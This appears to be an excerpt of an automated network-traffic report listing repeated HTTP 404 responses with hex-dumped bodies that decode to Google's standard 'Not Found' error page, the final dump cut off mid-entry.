                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:41 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:46 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:46 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:50 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 